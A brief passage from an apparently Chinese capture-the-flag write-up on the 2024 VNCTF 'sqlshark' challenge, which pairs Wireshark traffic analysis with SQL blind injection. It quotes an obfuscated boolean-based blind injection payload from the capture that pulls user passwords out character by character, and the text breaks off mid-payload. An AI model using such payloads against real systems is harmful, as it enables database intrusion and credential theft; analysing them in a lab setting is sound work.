sqlshark专题

2024 VNCTF----misc---sqlshark sql盲注+流量分析

流量分析  wireshark 可以看到很多 any'/**/Or/**/(iF(((((Ord(sUbstr((sElect(grOup_cOncat(password))frOm(users)) frOm 1 fOr 1))))in(80))),1,0))#   P any'/**/Or/**/(iF(((((Ord(sUbstr((sElect(grOup_cOncat(passwor